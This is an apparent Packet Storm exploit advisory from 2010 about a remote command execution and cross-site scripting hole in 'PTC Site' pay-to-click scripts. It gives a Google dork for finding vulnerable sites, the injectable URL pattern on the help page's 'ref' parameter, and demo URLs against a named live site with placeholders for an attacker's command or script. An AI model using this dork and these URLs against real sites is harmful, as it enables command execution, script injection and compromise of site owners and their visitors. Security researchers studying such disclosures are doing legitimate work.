PTC Site's Remote Command Execution / Cross Site Scripting

2010-05-30T00:00:00
ID PACKETSTORM:90083
Type packetstorm
Reporter CrazyMember
Modified 2010-05-30T00:00:00

Description

                                        
`
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
  
@Title: PTC Site's RCE/XSS Vulnerability  
@Vendor: http://www.ptcsites4sale.info and etc... :D  
@Author: CrazyMember  
@Mail: peymanteh@yahoo.com  
@SPC Thanks: XroGuE 4 r3p0r7 :P   
@Dork:"intext:Warning: passthru()" "inurl:view=help"  
  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
  
@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]  
  
Demo:   
  
#http://www.mysteryclickers.com/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Command]  
#http://www.mysteryclickers.com/index.php?view=help&faq=1&ref=[Your ScripT]  
  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
`